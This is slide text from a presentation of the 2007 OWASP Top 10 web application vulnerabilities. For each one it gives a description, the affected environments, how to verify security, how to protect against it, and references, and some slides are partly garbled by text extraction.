OWASP 3 OWASP Top 10 The Ten Most Critical Web Application Security Vulnerabilities 2007 Release A great start, but not a standard
OWASP 4 OWASP Top Cross Site Scripting (XSS) 2.Injection Flaws 3.Insecure Remote File Include 4.Insecure Direct Object Reference 5.Cross Site Request Forgery (CSRF) 6.Information Leakage and Improper Error Handling 7.Broken Authentication and Session Management 8.Insecure Cryptographic Storage 9.Insecure Communications 10.Failure to Restrict URL Access
OWASP 5 Top 10 Methodology Take the MITRE Vulnerability Trends for 2006, and distill the Top 10 web application security issuesMITRE Vulnerability Trends for 2006
OWASP 6 OWASP Top OWASP Top MITRE 2006 Raw Ranking 1. Cross Site Scripting (XSS)4. Cross Site Scripting (XSS)1 2. Injection Flaws6. Injection Flaws2 3. Insecure Remote File Include (NEW)3 4. Insecure Direct Object Reference2. Broken Access Control (split in 2007 T10)5 5. Cross Site Request Forgery (CSRF) (NEW)36 6. Info Leakage and Improper Error Handling7. Improper Error Handling6 7. Broken Auth. and Session Management3. Broken Authentication and Session Management14 8. Insecure Cryptographic Storage8. Insecure Storage8 9. Insecure Communications (NEW)Discussed under Failure to Restrict URL Access2. Broken Access Control (split in 2007 T10)14 1. Unvalidated Input7 5. Buffer Overflows4, 8, and Denial of Service Insecure Configuration Management29 Top 10 Mapping
OWASP 7 Cross Site Scripting (XSS)
OWASP 8 1. Cross-Site Scripting (XSS) Description Most prevalent web application security issue Allows attackers to execute script in the victim s browser Affected Environments All web application frameworks are vulnerable to cross site scripting
OWASP Cross-Site Scripting (XSS) Verifying Security All input parameters are validated and/or encoded Code Reviews are useful to detect Centralized validation and encoding mechanism Protection Combination of whitelist validation of all incoming data and appropriate encoding of all output data
OWASP Cross-Site Scripting (XSS) References OWASP – Cross site scripting, OWASP – Testing for XSS, OWASP Stinger Project (A Java EE validation filter) – OWASP PHP Filter Project - OWASP Encoding Project - RSnake, XSS Cheat Sheet, Klein, A., DOM Based Cross Site Scripting, Anti-XSS Library - 4f82-bfaf-e c25&DisplayLang=en 4f82-bfaf-e c25&DisplayLang=en Wikipedia Definition –
OWASP 12 Injection Flaws
OWASP Injection Flaws Description Injection occurs when user-supplied data is sent to an interpreter as part of a command or query SQL injection is the most common Affected Environments All web application frameworks that use interpreters are vulnerable to injection attacks.
OWASP Injection Flaws Vulnerabilities If user input is passed into an interpreter without validation or encoding, the application is vulnerable. Check to see if user input is supplied directly to dynamic queries
OWASP Injection Flaws Verifying Security Verify that the user can not modify commands or queries sent to any interpreter used by the application Code Reviews are useful to detect Protection Avoid interpreters where possible Enforce least privilege Stored procedures are susceptible too User input validation
OWASP Injection Flaws References OWASP, OWASP, OWASP, OWASP, SQL Injection, Advanced SQL Injection, More Advanced SQL Injection, Hibernate, an advanced object relational manager (ORM) for J2EE and.NET, J2EE Prepared Statements, How to: Protect from SQL injection in ASP.Net, PHP PDO functions,
OWASP 17 Insecure Remote File Include
OWASP Malicious File Injection Description Allows attackers to perform remote code execution etc by compromising input files or streams; commonly caused by improperly trusting input files Affected Environments All web application frameworks that allow uploaded files to be executed are vulnerable Environments are susceptible if they allow file upload into web directories.
OWASP Malicious File Injection Vulnerabilities Hostile data being uploaded to session files or log data PHP is most common, other technologies are accessible too Java and.Net Hostile DTD in XML Documents
OWASP Malicious File Injection Verifying Security Code Reviews are useful to detect Automated tools are useful Protection Do not allow a user defined file name to supply server-based resources Properly configured and implemented security protocols User input validation
OWASP Malicious File Injection References OWASP Guide, OWASP Testing Guide, OWASP PHP Top 5, Stefan Esser, [SIF01] Sift Networks, Web Services: Teaching an old dog new tricks, Java_Security_Policy Java_Security_Policy Microsoft - Programming for Partial Trust, us/library/ms364059(VS.80).aspxhttp://msdn2.microsoft.com/en- us/library/ms364059(VS.80).aspx
OWASP 22 Insecure Direct Object Reference
OWASP Insecure Direct Object Reference Description Occurs when a developer exposes an invalidated reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter Affected Environments All web application frameworks are vulnerable to attacks on insecure direct object references
OWASP Insecure Direct Object Reference Vulnerabilities Exposed internal object references Attackers use parameter tampering to change references and violate the intended but unenforced access control policy References to database keys are frequently exposed
OWASP Insecure Direct Object Reference Verifying Security Remove any direct object references that can be manipulated by an attacker Difficult for both automated and manual approaches Protection Best protection is to avoid exposing direct object references to users Verify authorization to all referenced objects
OWASP Insecure Direct Object Reference References OWASP, OWASP, OWASP, y y
OWASP 27 Cross Site Request Forgery (CSRF)
OWASP Cross Site Request Forgery (CSRF) Description An attack that tricks the victim into loading a page that contains a malicious request. Also known as Session Riding, One-Click Attacks, Cross Site Reference Forgery, Hostile Linking, and Automation Attack Affected Environments All web application frameworks are vulnerable to CSRF.
OWASP Cross Site Request Forgery (CSRF) Vulnerabilities In a forum, the attack may direct the user to invoke a logout function Can be combined with XSS
OWASP Cross Site Request Forgery (CSRF) Verifying Security Use an authorization token that is not automatically submitted by browser Protection Eliminate any XSS vulnerabilities in your application Add a per-request nonce to URL and all forms in addition to the standard session; if it is not built into your web app framework. Require additional login screens for sensitive data Do not use GET requests for sensitive data
OWASP 32 Information Leakage and Improper Error Handling
OWASP Information Leakage and Improper Error Handling Description Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems Affected Environments All web application frameworks are vulnerable to information leakage and improper error handling.
OWASP Information Leakage and Improper Error Handling Vulnerabilities Error message with too much detail Stack Traces SQL Statements Improper logging of detailed messages
OWASP Information Leakage and Improper Error Handling Verifying Security The goal is for the application to not leak detailed error messages Automated and Manual approaches are useful, but automated can not properly determine the meaning of the message and manual is time consuming Protection Use testing to generate error messages and perform ongoing evaluations in development Disable or limit detailed error handling
OWASP Information Leakage and Improper Error Handling References OWASP OWASP Vulnerability Vulnerability
OWASP 37 Broken Authentication and Session Management
OWASP Broken Authentication and Session Management Description Flaws in authentication and session management most frequently involve the failure to protect credentials and session tokens through their lifecycle. Affected Environments All web application frameworks are vulnerable to authentication and session management flaws
OWASP Broken Authentication and Session Management Vulnerabilities Flaws in main authentication mechanism Password management Session Timeout
OWASP Broken Authentication and Session Management Verifying Security Application should properly authenticate users and protect their credentials Automated tool have difficulty Combination of Code Reviews and Testing are effective Protection Maintain secure communication and credential storage Use single authentication mechanism where applicable Create a new session upon authentication Ensure the logout link destroys all pertinent data Do not expose any credentials in URL or logs
OWASP Insecure Cryptographic Storage Description Simply failing to encrypt sensitive data is very widespread. Applications that do encrypt frequently contain poorly designed cryptography, either using inappropriate ciphers or making serious mistakes using strong ciphers. Affected Environments All web application frameworks are vulnerable to insecure cryptographic storage.
OWASP Insecure Cryptographic Storage Vulnerabilities Not encrypting sensitive data Using home grown algorithms Insecure use of strong algorithms Continued use of proven weak algorithms (MD5, SHA- 1, RC3, RC4, etc…) Hard coding keys, and storing keys in unprotected stores
OWASP Insecure Cryptographic Storage Verifying Security Verify that the application properly encrypts sensitive information in storage Automated vulnerability tools are not effective Code Review is the best way to verify that an application encrypts sensitive data Protection Use only approved public algorithms Check to make sure all sensitive data is being encrypted
OWASP Insecure Cryptographic Storage References OWASP, OWASP, OWASP, OWASP, RLs RLs PCI Data Security Standard v1.1, https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf https://www.pcisecuritystandards.org/pdfs/pci_dss_v1-1.pdf Bruce Schneier, CryptoAPI Next Generation, us/library/aa aspxhttp://msdn2.microsoft.com/en- us/library/aa aspx
OWASP 47 Insecure Communications
OWASP Insecure Communications Description Applications frequently fail to encrypt network traffic when it is necessary to protect sensitive communications SSL must be used for all authenticated connections Affected Environments All web application frameworks are vulnerable to insecure communications.
OWASP Insecure Communications Vulnerabilities Network sniffing All authenticated traffic needs to go over SSL because HTTP includes authentication credentials or a session token with every single request; not just the actual login request Always use SSL with sensitive data
OWASP Insecure Communications Verifying Security Verify that the application properly encrypts all authenticated and sensitive communications Vulnerability scanning tools can verify that SSL is used on the front end, and can find many SSL related flaws Code review is quite efficient for verifying the proper use of SSL for all backend connections Protection Always use SSL with sensitive data
OWASP Insecure Communications References OWASP Testing Guide, Testing for SSL / TLS, https://www.owasp.org/index.php/Testing_for_SSL-TLS https://www.owasp.org/index.php/Testing_for_SSL-TLS OWASP Guide, Foundstone - SSL Digger, m&subcontent=/services/overview_s3i_des.htm m&subcontent=/services/overview_s3i_des.htm NIST, SP Guidelines for the selection and use of transport layer security (TLS) Implementations, NIST SP Guide to secure web services,
OWASP 52 Failure to Restrict URL Access
OWASP Failure to Restrict URL Access Description Relying on security by obscurity to restrict URL access Not using access control checks for URLs Affected Environments All web application frameworks are vulnerable to failure to restrict URL access
OWASP Failure to Restrict URL Access Vulnerabilities Forced browsing Hidden URLs and files Outdated security mechanism Evaluating privileges only on the client
OWASP Failure to Restrict URL Access Verifying Security Verify that access control is enforced consistently for all URLs in the application Automated tools have difficulty verifying URL access control Combination of Code Reviews and Testing are effective Protection Properly architecting and implementing roles for URL access Ensure all URLs are part of this process Do not use hidden URLs